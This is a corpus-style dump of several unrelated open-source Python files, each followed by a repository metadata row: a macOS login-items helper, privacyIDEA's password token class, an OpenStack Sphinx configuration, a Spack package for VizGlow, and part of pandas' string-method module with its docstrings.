# Now move the old item back under the new one
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, needs_fixing, {}, [])
else:
# We're aiming for an index based on something else in the list.
# Only do something if we're not aiming at ourselves.
insert_after_path = _get_item_cfurl(destination_point).path()
if (insert_after_path != path_to_item):
# Seems to be a different file
if path_to_item in current_paths:
# Remove our object if it's already present
i = current_paths.index(path_to_item)
self_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, self_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Re-find our original target
current_paths = list_login_items()
i = current_paths.index(insert_after_path)
destination_point = current_items[i]
# Add ourselves after the file
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
| mit | -3,015,296,332,508,749,000 | 53.590062 | 230 | 0.661281 | false | 3.752775 | false | false | false |
jalr/privacyidea | privacyidea/lib/tokens/passwordtoken.py | 1 | 4231 | # -*- coding: utf-8 -*-
#
# privacyIDEA is a fork of LinOTP
# 2014-12-05 Cornelius Kölbel <[email protected]>
# Migration to flask
#
# May 08, 2014 Cornelius Kölbel
# License: AGPLv3
# contact: http://www.privacyidea.org
#
# Copyright (C) 2010 - 2014 LSE Leading Security Experts GmbH
# License: LSE
# contact: http://www.linotp.org
# http://www.lsexperts.de
# [email protected]
"""
This file contains the definition of the password token class
"""
import logging
from privacyidea.lib.crypto import zerome
from privacyidea.lib.tokenclass import TokenClass
from privacyidea.lib.log import log_with
from privacyidea.lib.decorators import check_token_locked
optional = True
required = False
log = logging.getLogger(__name__)
class PasswordTokenClass(TokenClass):
"""
This Token does use a fixed Password as the OTP value.
In addition, the OTP PIN can be used with this token.
This Token can be used for a scenario like losttoken
"""
class SecretPassword(object):
def __init__(self, secObj):
self.secretObject = secObj
def get_password(self):
return self.secretObject.getKey()
def check_password(self, password):
res = -1
key = self.secretObject.getKey()
if key == password:
res = 0
zerome(key)
del key
return res
def __init__(self, aToken):
TokenClass.__init__(self, aToken)
self.hKeyRequired = True
self.set_type(u"pw")
@staticmethod
def get_class_type():
return "pw"
@staticmethod
def get_class_prefix():
return "PW"
@staticmethod
@log_with(log)
def get_class_info(key=None, ret='all'):
"""
returns a subtree of the token definition
:param key: subsection identifier
:type key: string
:param ret: default return value, if nothing is found
:type ret: user defined
:return: subsection if key exists or user defined
:rtype: dict or scalar
"""
res = {'type': 'pw',
'title': 'Password Token',
'description': ('A token with a fixed password. Can be '
'combined with the OTP PIN. Is used for the '
'lost token scenario.'),
'init': {},
'config': {},
'user': [],
# This tokentype is enrollable in the UI for...
'ui_enroll': [],
'policy': {},
}
# I don't think we need to define the lost token policies here...
if key is not None and key in res:
ret = res.get(key)
else:
if ret == 'all':
ret = res
return ret
def update(self, param):
"""
This method is called during the initialization process.
:param param: parameters from the token init
:type param: dict
:return: None
"""
"""
:param param:
:return:
"""
TokenClass.update(self, param)
self.set_otplen()
@log_with(log)
@check_token_locked
def set_otplen(self, otplen=0):
"""
sets the OTP length to the length of the password
:param otplen: This is ignored in this class
:type otplen: int
:result: None
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
pw_len = len(sp.get_password())
TokenClass.set_otplen(self, pw_len)
return
@log_with(log, log_entry=False)
@check_token_locked
def check_otp(self, anOtpVal, counter=None, window=None, options=None):
"""
This checks the static password
:param anOtpVal: This contains the "OTP" value, which is the static
password
:return: result of password check, 0 in case of success, -1 if fail
:rtype: int
"""
secretHOtp = self.token.get_otpkey()
sp = PasswordTokenClass.SecretPassword(secretHOtp)
res = sp.check_password(anOtpVal)
return res
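# Illustrative flow (sketch; assumes a database token object ``db_token`` and
# that the static password is passed via the "otpkey" init parameter -- check
# the privacyIDEA token API for authoritative usage):
#   tok = PasswordTokenClass(db_token)
#   tok.update({"otpkey": "s3cret"})
#   tok.check_otp("s3cret")   # -> 0 on match
#   tok.check_otp("wrong")    # -> -1 on mismatch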
| agpl-3.0 | -5,484,447,843,256,674,000 | 26.640523 | 77 | 0.568456 | false | 3.912118 | false | false | false |
AlekhyaMallina-Vedams/openstack-manuals | doc/common/source/conf.py | 1 | 4284 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
# import sys
import openstackdocstheme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
# TODO(ajaeger): enable PDF building, for example add 'rst2pdf.pdfbuilder'
extensions = []
# Add any paths that contain templates here, relative to this directory.
# templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Common documents'
bug_tag = u'common'
copyright = u'2015-2016, OpenStack contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# A few variables have to be set for the log-a-bug feature.
# giturl: The location of conf.py on Git. Must be set manually.
# gitsha: The SHA of the most recent commit, extracted automatically from git log.
# bug_tag: Tag for categorizing the bug. Must be set manually.
# These variables are passed to the logabug code via html_context.
giturl = u'http://git.openstack.org/cgit/openstack/openstack-manuals/tree/doc/common/source'
git_cmd = "/usr/bin/git log | head -n1 | cut -f2 -d' '"
gitsha = os.popen(git_cmd).read().strip('\n')
html_context = {"gitsha": gitsha, "bug_tag": bug_tag,
"giturl": giturl}
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for Internationalization output ------------------------------
locale_dirs = ['locale/']
| apache-2.0 | 622,890,007,791,508,100 | 34.114754 | 92 | 0.721522 | false | 3.764499 | false | false | false |
skosukhin/spack | var/spack/repos/builtin/packages/vizglow/package.py | 1 | 4498 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import glob
import os
class Vizglow(Package):
"""VizGlow software tool is used for high-fidelity multi-dimensional
modeling of non-equilibrium plasma discharges.
Note: VizGlow is licensed software. You will need to create an account on
the EsgeeTech homepage and download VizGlow yourself. Spack will search
your current directory for a file of this format. Alternatively, add this
file to a mirror so that Spack can find it. For instructions on how to
set up a mirror, see http://spack.readthedocs.io/en/latest/mirrors.html"""
homepage = "http://esgeetech.com/products/vizglow-plasma-modeling/"
version('2.2alpha20', '2bef890c66f3a44aaf96f7c96788c89e', expand=False,
url="file://{0}/VizGlow_v2.2alpha20-Linux-x86_64-R09December2016-Install".format(os.getcwd()))
version('2.2alpha17', '1de268564363e0ee86f9ffff1c3b82e1', expand=False,
url="file://{0}/VizGlow_v2.2alpha17-R21November2016-Linux-x86_64-Install".format(os.getcwd()))
version('2.2alpha15', 'be2b5044f30f2b2c3bbe87a0037bf228', expand=False,
url="file://{0}/VizGlow_v2.2alpha15-Linux-x86_64-R31October2016-Install".format(os.getcwd()))
# depends_on('mesa') # TODO: mesa build doesn't work for me
depends_on('zlib')
depends_on('freetype')
depends_on('fontconfig')
depends_on('libxrender')
depends_on('xterm')
# Can't get mozjs to build, packagekit -> polkit -> mozjs
# depends_on('packagekit+gtk')
depends_on('libcanberra+gtk')
# Licensing
license_required = True
license_comment = '#'
license_files = ['esgeelm.lic']
license_vars = ['ESGEE_LICENSE_FILE']
def configure(self, prefix):
# Dictionary of responses
responses = {
'CreateDesktopShortcut': 'No',
'CreateQuickLaunchShortcut': 'No',
'InstallDir': prefix
}
# Write response file
with open('spack-responses.txt', 'w') as response_file:
for key in responses:
response_file.write('{0}: {1}\n'.format(key, responses[key]))
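        # The generated spack-responses.txt then contains one "key: value"
        # line per entry above (order follows dict iteration), e.g.:
        #   CreateDesktopShortcut: No
        #   CreateQuickLaunchShortcut: No
        #   InstallDir: <prefix>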
def install(self, spec, prefix):
self.configure(prefix)
installer = glob.glob('VizGlow*Install')[0]
chmod = which('chmod')
chmod('+x', installer)
installer = Executable(installer)
installer('--mode', 'silent', '--response-file', 'spack-responses.txt')
self.filter_ld_library_path(spec, prefix)
def filter_ld_library_path(self, spec, prefix):
"""Run after install to inject dependencies into LD_LIBRARY_PATH.
If we don't do this, the run files will clear the LD_LIBRARY_PATH.
Since the installer is a binary file, we have no means of specifying
an RPATH to use."""
files = glob.glob(prefix + '/binaries/*.run')
ld_library_path = ':'.join([
spec['zlib'].prefix.lib,
spec['freetype'].prefix.lib,
spec['fontconfig'].prefix.lib,
spec['libxrender'].prefix.lib,
spec['libcanberra'].prefix.lib
])
for runfile in files:
filter_file('(export LD_LIBRARY_PATH=)$',
r'\1{0}'.format(ld_library_path),
runfile)
| lgpl-2.1 | -3,512,128,012,529,714,700 | 39.522523 | 106 | 0.642952 | false | 3.73278 | false | false | false |
kushalbhola/MyStuff | Practice/PythonApplication/env/Lib/site-packages/pandas/core/strings.py | 1 | 105891 | import codecs
from functools import wraps
import re
import textwrap
from typing import Dict, List
import warnings
import numpy as np
import pandas._libs.lib as lib
import pandas._libs.ops as libops
from pandas.util._decorators import Appender, deprecate_kwarg
from pandas.core.dtypes.common import (
ensure_object,
is_bool_dtype,
is_categorical_dtype,
is_integer,
is_list_like,
is_re,
is_scalar,
is_string_like,
)
from pandas.core.dtypes.generic import ABCIndexClass, ABCMultiIndex, ABCSeries
from pandas.core.dtypes.missing import isna
from pandas.core.algorithms import take_1d
from pandas.core.base import NoNewAttributesMixin
import pandas.core.common as com
_cpython_optimized_encoders = (
"utf-8",
"utf8",
"latin-1",
"latin1",
"iso-8859-1",
"mbcs",
"ascii",
)
_cpython_optimized_decoders = _cpython_optimized_encoders + ("utf-16", "utf-32")
_shared_docs = dict() # type: Dict[str, str]
def cat_core(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
list_with_sep = [sep] * (2 * len(list_of_columns) - 1)
list_with_sep[::2] = list_of_columns
return np.sum(list_with_sep, axis=0)
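# Conceptual sketch of cat_core (illustrative, not part of the public API):
# for columns [a, b] and sep "-", list_with_sep becomes [a, "-", b] and the
# np.sum reduction performs element-wise string addition, i.e. a + "-" + b.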
def cat_safe(list_of_columns: List, sep: str):
"""
Auxiliary function for :meth:`str.cat`.
Same signature as cat_core, but handles TypeErrors in concatenation, which
happen if the arrays in list_of columns have the wrong dtypes or content.
Parameters
----------
list_of_columns : list of numpy arrays
List of arrays to be concatenated with sep;
these arrays may not contain NaNs!
sep : string
The separator string for concatenating the columns
Returns
-------
nd.array
The concatenation of list_of_columns with sep
"""
try:
result = cat_core(list_of_columns, sep)
except TypeError:
# if there are any non-string values (wrong dtype or hidden behind
# object dtype), np.sum will fail; catch and return with better message
for column in list_of_columns:
dtype = lib.infer_dtype(column, skipna=True)
if dtype not in ["string", "empty"]:
raise TypeError(
"Concatenation requires list-likes containing only "
"strings (or missing values). Offending values found in "
"column {}".format(dtype)
) from None
return result
def _na_map(f, arr, na_result=np.nan, dtype=object):
# should really _check_ for NA
return _map(f, arr, na_mask=True, na_value=na_result, dtype=dtype)
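# _map applies ``f`` element-wise over ``arr``; with na_mask=True, missing
# values are masked out and filled with ``na_value``, and if ``f`` raises
# TypeError/AttributeError for some elements it falls back to a per-element
# wrapper that substitutes ``na_value`` (unless ``f`` was simply called with
# the wrong number of arguments, in which case the error is re-raised).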
def _map(f, arr, na_mask=False, na_value=np.nan, dtype=object):
if not len(arr):
return np.ndarray(0, dtype=dtype)
if isinstance(arr, ABCSeries):
arr = arr.values
if not isinstance(arr, np.ndarray):
arr = np.asarray(arr, dtype=object)
if na_mask:
mask = isna(arr)
try:
convert = not all(mask)
result = lib.map_infer_mask(arr, f, mask.view(np.uint8), convert)
except (TypeError, AttributeError) as e:
# Reraise the exception if callable `f` got wrong number of args.
# The user may want to be warned by this, instead of getting NaN
p_err = (
r"((takes)|(missing)) (?(2)from \d+ to )?\d+ "
r"(?(3)required )positional arguments?"
)
if len(e.args) >= 1 and re.search(p_err, e.args[0]):
raise e
def g(x):
try:
return f(x)
except (TypeError, AttributeError):
return na_value
return _map(g, arr, dtype=dtype)
if na_value is not np.nan:
np.putmask(result, mask, na_value)
if result.dtype == object:
result = lib.maybe_convert_objects(result)
return result
else:
return lib.map_infer(arr, f)
def str_count(arr, pat, flags=0):
"""
Count occurrences of pattern in each string of the Series/Index.
This function is used to count the number of times a particular regex
pattern is repeated in each of the string elements of the
:class:`~pandas.Series`.
Parameters
----------
pat : str
Valid regular expression.
flags : int, default 0, meaning no flags
Flags for the `re` module. For a complete list, `see here
<https://docs.python.org/3/howto/regex.html#compilation-flags>`_.
**kwargs
For compatibility with other string methods. Not used.
Returns
-------
Series or Index
Same type as the calling object containing the integer counts.
See Also
--------
re : Standard library module for regular expressions.
str.count : Standard library version, without regular expression support.
Notes
-----
Some characters need to be escaped when passing in `pat`.
    e.g. ``'$'`` has a special meaning in regex and must be escaped when
finding this literal character.
Examples
--------
>>> s = pd.Series(['A', 'B', 'Aaba', 'Baca', np.nan, 'CABA', 'cat'])
>>> s.str.count('a')
0 0.0
1 0.0
2 2.0
3 2.0
4 NaN
5 0.0
6 1.0
dtype: float64
Escape ``'$'`` to find the literal dollar sign.
>>> s = pd.Series(['$', 'B', 'Aab$', '$$ca', 'C$B$', 'cat'])
>>> s.str.count('\\$')
0 1
1 0
2 1
3 2
4 2
5 0
dtype: int64
This is also available on Index
>>> pd.Index(['A', 'A', 'Aaba', 'cat']).str.count('a')
Int64Index([0, 0, 2, 1], dtype='int64')
"""
regex = re.compile(pat, flags=flags)
f = lambda x: len(regex.findall(x))
return _na_map(f, arr, dtype=int)
def str_contains(arr, pat, case=True, flags=0, na=np.nan, regex=True):
"""
Test if pattern or regex is contained within a string of a Series or Index.
Return boolean Series or Index based on whether a given pattern or regex is
contained within a string of a Series or Index.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
Flags to pass through to the re module, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
regex : bool, default True
If True, assumes the pat is a regular expression.
If False, treats the pat as a literal string.
Returns
-------
Series or Index of boolean values
A Series or Index of boolean values indicating whether the
given pattern is contained within the string of each element
of the Series or Index.
See Also
--------
match : Analogous, but stricter, relying on re.match instead of re.search.
Series.str.startswith : Test if the start of each string element matches a
pattern.
Series.str.endswith : Same as startswith, but tests the end of string.
Examples
--------
Returning a Series of booleans using only a literal pattern.
>>> s1 = pd.Series(['Mouse', 'dog', 'house and parrot', '23', np.NaN])
>>> s1.str.contains('og', regex=False)
0 False
1 True
2 False
3 False
4 NaN
dtype: object
Returning an Index of booleans using only a literal pattern.
>>> ind = pd.Index(['Mouse', 'dog', 'house and parrot', '23.0', np.NaN])
>>> ind.str.contains('23', regex=False)
Index([False, False, False, True, nan], dtype='object')
Specifying case sensitivity using `case`.
>>> s1.str.contains('oG', case=True, regex=True)
0 False
1 False
2 False
3 False
4 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN` replaces NaN values
with `False`. If Series or Index does not contain NaN values
the resultant dtype will be `bool`, otherwise, an `object` dtype.
>>> s1.str.contains('og', na=False, regex=True)
0 False
1 True
2 False
3 False
4 False
dtype: bool
Returning 'house' or 'dog' when either expression occurs in a string.
>>> s1.str.contains('house|dog', regex=True)
0 False
1 True
2 True
3 False
4 NaN
dtype: object
Ignoring case sensitivity using `flags` with regex.
>>> import re
>>> s1.str.contains('PARROT', flags=re.IGNORECASE, regex=True)
0 False
1 False
2 True
3 False
4 NaN
dtype: object
Returning any digit using regular expression.
>>> s1.str.contains('\\d', regex=True)
0 False
1 False
2 False
3 True
4 NaN
dtype: object
Ensure `pat` is a not a literal pattern when `regex` is set to True.
Note in the following example one might expect only `s2[1]` and `s2[3]` to
return `True`. However, '.0' as a regex matches any character
followed by a 0.
>>> s2 = pd.Series(['40', '40.0', '41', '41.0', '35'])
>>> s2.str.contains('.0', regex=True)
0 True
1 True
2 False
3 True
4 False
dtype: bool
"""
if regex:
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
if regex.groups > 0:
warnings.warn(
"This pattern has match groups. To actually get the"
" groups, use str.extract.",
UserWarning,
stacklevel=3,
)
f = lambda x: bool(regex.search(x))
else:
if case:
f = lambda x: pat in x
else:
upper_pat = pat.upper()
f = lambda x: upper_pat in x
uppered = _na_map(lambda x: x.upper(), arr)
return _na_map(f, uppered, na, dtype=bool)
return _na_map(f, arr, na, dtype=bool)
def str_startswith(arr, pat, na=np.nan):
"""
Test if the start of each string element matches a pattern.
Equivalent to :meth:`str.startswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the start of each string element.
See Also
--------
str.startswith : Python standard library string method.
Series.str.endswith : Same as startswith, but tests the end of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'Bear', 'cat', np.nan])
>>> s
0 bat
1 Bear
2 cat
3 NaN
dtype: object
>>> s.str.startswith('b')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.startswith('b', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.startswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_endswith(arr, pat, na=np.nan):
"""
Test if the end of each string element matches a pattern.
Equivalent to :meth:`str.endswith`.
Parameters
----------
pat : str
Character sequence. Regular expressions are not accepted.
na : object, default NaN
Object shown if element tested is not a string.
Returns
-------
Series or Index of bool
A Series of booleans indicating whether the given pattern matches
the end of each string element.
See Also
--------
str.endswith : Python standard library string method.
Series.str.startswith : Same as endswith, but tests the start of string.
Series.str.contains : Tests if string element contains a pattern.
Examples
--------
>>> s = pd.Series(['bat', 'bear', 'caT', np.nan])
>>> s
0 bat
1 bear
2 caT
3 NaN
dtype: object
>>> s.str.endswith('t')
0 True
1 False
2 False
3 NaN
dtype: object
Specifying `na` to be `False` instead of `NaN`.
>>> s.str.endswith('t', na=False)
0 True
1 False
2 False
3 False
dtype: bool
"""
f = lambda x: x.endswith(pat)
return _na_map(f, arr, na, dtype=bool)
def str_replace(arr, pat, repl, n=-1, case=None, flags=0, regex=True):
r"""
Replace occurrences of pattern/regex in the Series/Index with
some other string. Equivalent to :meth:`str.replace` or
:func:`re.sub`.
Parameters
----------
pat : str or compiled regex
String can be a character sequence or regular expression.
.. versionadded:: 0.20.0
`pat` also accepts a compiled regex.
repl : str or callable
Replacement string or a callable. The callable is passed the regex
match object and must return a replacement string to be used.
See :func:`re.sub`.
.. versionadded:: 0.20.0
`repl` also accepts a callable.
n : int, default -1 (all)
Number of replacements to make from start.
case : bool, default None
- If True, case sensitive (the default if `pat` is a string)
- Set to False for case insensitive
- Cannot be set if `pat` is a compiled regex
flags : int, default 0 (no flags)
- re module flags, e.g. re.IGNORECASE
- Cannot be set if `pat` is a compiled regex
regex : bool, default True
- If True, assumes the passed-in pattern is a regular expression.
- If False, treats the pattern as a literal string
- Cannot be set to False if `pat` is a compiled regex or `repl` is
a callable.
.. versionadded:: 0.23.0
Returns
-------
Series or Index of object
A copy of the object with all matching occurrences of `pat` replaced by
`repl`.
Raises
------
ValueError
* if `regex` is False and `repl` is a callable or `pat` is a compiled
regex
* if `pat` is a compiled regex and `case` or `flags` is set
Notes
-----
When `pat` is a compiled regex, all flags should be included in the
compiled regex. Use of `case`, `flags`, or `regex=False` with a compiled
regex will raise an error.
Examples
--------
When `pat` is a string and `regex` is True (the default), the given `pat`
is compiled as a regex. When `repl` is a string, it replaces matching
regex patterns as with :meth:`re.sub`. NaN value(s) in the Series are
left as is:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f.', 'ba', regex=True)
0 bao
1 baz
2 NaN
dtype: object
When `pat` is a string and `regex` is False, every `pat` is replaced with
`repl` as with :meth:`str.replace`:
>>> pd.Series(['f.o', 'fuz', np.nan]).str.replace('f.', 'ba', regex=False)
0 bao
1 fuz
2 NaN
dtype: object
When `repl` is a callable, it is called on every `pat` using
:func:`re.sub`. The callable should expect one positional argument
(a regex object) and return a string.
To get the idea:
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace('f', repr)
0 <_sre.SRE_Match object; span=(0, 1), match='f'>oo
1 <_sre.SRE_Match object; span=(0, 1), match='f'>uz
2 NaN
dtype: object
Reverse every lowercase alphabetic word:
>>> repl = lambda m: m.group(0)[::-1]
>>> pd.Series(['foo 123', 'bar baz', np.nan]).str.replace(r'[a-z]+', repl)
0 oof 123
1 rab zab
2 NaN
dtype: object
Using regex groups (extract second group and swap case):
>>> pat = r"(?P<one>\w+) (?P<two>\w+) (?P<three>\w+)"
>>> repl = lambda m: m.group('two').swapcase()
>>> pd.Series(['One Two Three', 'Foo Bar Baz']).str.replace(pat, repl)
0 tWO
1 bAR
dtype: object
Using a compiled regex with flags
>>> import re
>>> regex_pat = re.compile(r'FUZ', flags=re.IGNORECASE)
>>> pd.Series(['foo', 'fuz', np.nan]).str.replace(regex_pat, 'bar')
0 foo
1 bar
2 NaN
dtype: object
"""
# Check whether repl is valid (GH 13438, GH 15055)
if not (is_string_like(repl) or callable(repl)):
raise TypeError("repl must be a string or callable")
is_compiled_re = is_re(pat)
if regex:
if is_compiled_re:
if (case is not None) or (flags != 0):
raise ValueError(
"case and flags cannot be set" " when pat is a compiled regex"
)
else:
# not a compiled regex
# set default case
if case is None:
case = True
# add case flag, if provided
if case is False:
flags |= re.IGNORECASE
if is_compiled_re or len(pat) > 1 or flags or callable(repl):
n = n if n >= 0 else 0
compiled = re.compile(pat, flags=flags)
f = lambda x: compiled.sub(repl=repl, string=x, count=n)
else:
f = lambda x: x.replace(pat, repl, n)
else:
if is_compiled_re:
raise ValueError(
"Cannot use a compiled regex as replacement " "pattern with regex=False"
)
if callable(repl):
raise ValueError("Cannot use a callable replacement when " "regex=False")
f = lambda x: x.replace(pat, repl, n)
return _na_map(f, arr)
def str_repeat(arr, repeats):
"""
Duplicate each string in the Series or Index.
Parameters
----------
repeats : int or sequence of int
Same value for all (int) or different value per (sequence).
Returns
-------
Series or Index of object
Series or Index of repeated string objects specified by
input parameter repeats.
Examples
--------
>>> s = pd.Series(['a', 'b', 'c'])
>>> s
0 a
1 b
2 c
dtype: object
Single int repeats string in Series
>>> s.str.repeat(repeats=2)
0 aa
1 bb
2 cc
dtype: object
Sequence of int repeats corresponding string in Series
>>> s.str.repeat(repeats=[1, 2, 3])
0 a
1 bb
2 ccc
dtype: object
"""
if is_scalar(repeats):
def scalar_rep(x):
try:
return bytes.__mul__(x, repeats)
except TypeError:
return str.__mul__(x, repeats)
return _na_map(scalar_rep, arr)
else:
def rep(x, r):
try:
return bytes.__mul__(x, r)
except TypeError:
return str.__mul__(x, r)
repeats = np.asarray(repeats, dtype=object)
result = libops.vec_binop(com.values_from_object(arr), repeats, rep)
return result
def str_match(arr, pat, case=True, flags=0, na=np.nan):
"""
Determine if each string matches a regular expression.
Parameters
----------
pat : str
Character sequence or regular expression.
case : bool, default True
If True, case sensitive.
flags : int, default 0 (no flags)
re module flags, e.g. re.IGNORECASE.
na : default NaN
Fill value for missing values.
Returns
-------
Series/array of boolean values
See Also
--------
contains : Analogous, but less strict, relying on re.search instead of
re.match.
extract : Extract matched groups.
"""
if not case:
flags |= re.IGNORECASE
regex = re.compile(pat, flags=flags)
dtype = bool
f = lambda x: bool(regex.match(x))
return _na_map(f, arr, na, dtype=dtype)
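# Illustrative behaviour (sketch, via the public Series.str.match accessor
# that is backed by this function):
#   pd.Series(['a1', 'b2', 'c3']).str.match(r'[ab]\d')
#   0     True
#   1     True
#   2    False
#   dtype: bool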
def _get_single_group_name(rx):
try:
return list(rx.groupindex.keys()).pop()
except IndexError:
return None
def _groups_or_na_fun(regex):
"""Used in both extract_noexpand and extract_frame"""
if regex.groups == 0:
raise ValueError("pattern contains no capture groups")
empty_row = [np.nan] * regex.groups
def f(x):
if not isinstance(x, str):
return empty_row
m = regex.search(x)
if m:
return [np.nan if item is None else item for item in m.groups()]
else:
return empty_row
return f
def _str_extract_noexpand(arr, pat, flags=0):
"""
Find groups in each string in the Series using passed regular
expression. This function is called from
str_extract(expand=False), and can return Series, DataFrame, or
Index.
"""
from pandas import DataFrame, Index
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
if regex.groups == 1:
result = np.array([groups_or_na(val)[0] for val in arr], dtype=object)
name = _get_single_group_name(regex)
else:
if isinstance(arr, Index):
raise ValueError("only one regex group is supported with Index")
name = None
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if arr.empty:
result = DataFrame(columns=columns, dtype=object)
else:
result = DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=arr.index,
dtype=object,
)
return result, name
def _str_extract_frame(arr, pat, flags=0):
"""
For each subject string in the Series, extract groups from the
first match of regular expression pat. This function is called from
str_extract(expand=True), and always returns a DataFrame.
"""
from pandas import DataFrame
regex = re.compile(pat, flags=flags)
groups_or_na = _groups_or_na_fun(regex)
names = dict(zip(regex.groupindex.values(), regex.groupindex.keys()))
columns = [names.get(1 + i, i) for i in range(regex.groups)]
if len(arr) == 0:
return DataFrame(columns=columns, dtype=object)
try:
result_index = arr.index
except AttributeError:
result_index = None
return DataFrame(
[groups_or_na(val) for val in arr],
columns=columns,
index=result_index,
dtype=object,
)
def str_extract(arr, pat, flags=0, expand=True):
r"""
Extract capture groups in the regex `pat` as columns in a DataFrame.
For each subject string in the Series, extract groups from the
first match of regular expression `pat`.
Parameters
----------
pat : str
Regular expression pattern with capturing groups.
flags : int, default 0 (no flags)
Flags from the ``re`` module, e.g. ``re.IGNORECASE``, that
modify regular expression matching for things like case,
spaces, etc. For more details, see :mod:`re`.
expand : bool, default True
If True, return DataFrame with one column per capture group.
If False, return a Series/Index if there is one capture group
or DataFrame if there are multiple capture groups.
.. versionadded:: 0.18.0
Returns
-------
DataFrame or Series or Index
A DataFrame with one row for each subject string, and one
column for each group. Any capture group names in regular
expression pat will be used for column names; otherwise
capture group numbers will be used. The dtype of each result
column is always object, even when no match is found. If
``expand=False`` and pat has only one capture group, then
return a Series (if subject is a Series) or Index (if subject
is an Index).
See Also
--------
extractall : Returns all matches (not just the first match).
Examples
--------
A pattern with two groups will return a DataFrame with two columns.
Non-matches will be NaN.
>>> s = pd.Series(['a1', 'b2', 'c3'])
>>> s.str.extract(r'([ab])(\d)')
0 1
0 a 1
1 b 2
2 NaN NaN
A pattern may contain optional groups.
>>> s.str.extract(r'([ab])?(\d)')
0 1
0 a 1
1 b 2
2 NaN 3
Named groups will become column names in the result.
>>> s.str.extract(r'(?P<letter>[ab])(?P<digit>\d)')
letter digit
0 a 1
1 b 2
2 NaN NaN
A pattern with one group will return a DataFrame with one column
if expand=True.
>>> s.str.extract(r'[ab](\d)', expand=True)
0
0 1
1 2
2 NaN
A pattern with one group will return a Series if expand=False.
>>> s.str.extract(r'[ab](\d)', expand=False)
0 1
1 2
2 NaN
dtype: object
"""
if not isinstance(expand, bool):
raise ValueError("expand must be True or False")
if expand:
return _str_extract_frame(arr._orig, pat, flags=flags)
else:
result, name = _str_extract_noexpand(arr._parent, pat, flags=flags)
